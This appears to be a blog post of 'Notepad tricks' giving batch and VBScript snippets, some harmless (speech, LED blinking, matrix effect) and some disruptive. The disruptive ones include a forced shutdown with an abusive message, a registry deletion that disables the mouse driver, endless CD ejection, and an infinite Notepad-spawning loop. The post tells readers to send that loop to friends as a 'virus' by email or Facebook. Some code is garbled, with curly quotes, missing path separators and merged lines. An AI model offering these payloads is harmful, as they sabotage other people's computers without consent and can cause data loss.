Notepad is default text editor in every OS and it enables computer users to create documents or files. Notepad is plain text editor we use notepad in daily life in our simple work. Notepad has not only the ability of making .txt documents but also we can create other files also by changing its extension like .txt to .bat or .xml. In all types of Microsoft Windows Notepad is default program cause it is very useful text editor but often we think to do more with these programs. Notepad can help you in increase your programming skills because it support almost all extensions like Html, JavaScript, JQuery, Batch Files etc. There are many Useful Tips and Tricks and Hacks about Notepad you can do like you can make computer virus and do pranks with your friends. If you thinking notepad s just simple program then you are wrong there are many Notepad Tips Tricks and Hacks so today i will show top best cool Notepad Tricks. All the below given notepad tricks may or may not be work depend on your Hardware and Software and Run them at your own risk any kind of data loss or software failure we will not be not be responsible for it.
Cool Notepad Tips and Tricks 2016
1. Shutdown PC
With this cool notepad trick you can shut down your PC or Laptop by just only clicking on the file copy the code below and paste it in notepad.
Save the file with your desired name but make sure to add extension .bat like Name.bat and enjoy!
@echo off
Shutdown.exe -s -t 10
cls
msg * I don’t like you SHIT!
Shutdown.exe -s -t 10
cls
msg * I don’t like you SHIT!
2. Computer Speaking Your Message
With this cool notepad trick your PC or laptop will able to speak whatever you want to speak from your Computer or Laptop just open notepad copy the below code and paste in notepad now and save file as name.vbs
Dim speaks, speech
speaks=”Welcome to AllUsefulTricks.com”
Set speech=CreateObject(“sapi.spvoice”)
speech.Speak speaks
Save the file with Name.vbs extension and double click to run it.
Replace the text “Welcome to AllUsefulTricks.com” with your message and Enjoy!
3. Disable The Mouse
This is an awesome trick in which you can disable the mouse with this simple code just copy the code and paste in notepad and save file as name.vbs
rem Disable Mouse
set key=”HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesMouclass”
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
set key=”HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesMouclass”
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
Do this at your own risk
4. Dancing Keyboard LED
This is another cool notepad trick showing you the dancing LEDs Copy the code given below and paste in notepad
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop
Save the notepad file with Name.vbs extension and double click it.
5. Eject CD Drive Continously
This is another funny and cool amazing trick with this trick your PC's CD drive continously moving in and out. just copy given below code and paste in notepad and save file as name.vbs
Set oWMP = CreateObject(“WMPlayer.OCX.7”)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
6. Use Notepad As Diary
This trick is used to save your notepad document with data and time every time you open the notepad it will looks like a dairy. You have to type the following command
1. Type the Name.Log in capital letters in notepad.
2. Save the file with default extension and close it.
7. Falling Matrix Code Effect
This Is The Cool And Best Notepad Trick Ever. In This Trick You Will See The Green Code Falling Continuously. This Trick Is Inspired By The Matrix Movie.
- Open Your Notepad
- Copy The Below Given Code And Paste In Your Notepad.
- Then Save The File With Name.Bat Extension.
- @echo offcolor 02:startecho %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%goto startSave the file with, Name.bat extension and open the file.
8. Open Notepad Continously in Your friends PC
With this trick you can easily prank you friends, by sending him this virus with this virus your friend’s pc continouly open notepad without clicking it he will scared with this trick is it cool! You can send this file via Gmail or another mail or Facebook or any other resource now come to the point to make this file open notepad and copy the code given below and paste in notepad and save the file as interstingname.bat and save it.
@ECHO Off
:Top
START %SystemRoot%System32notepad.Exe
GOTO Top

No comments:
Post a Comment